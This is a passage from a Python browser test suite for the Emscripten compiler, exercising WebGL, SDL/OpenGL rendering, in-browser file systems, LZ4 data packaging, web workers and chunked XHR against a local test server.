self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', 0, args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', path_from_root('tests', 'test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([path_from_root('tests', 'fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
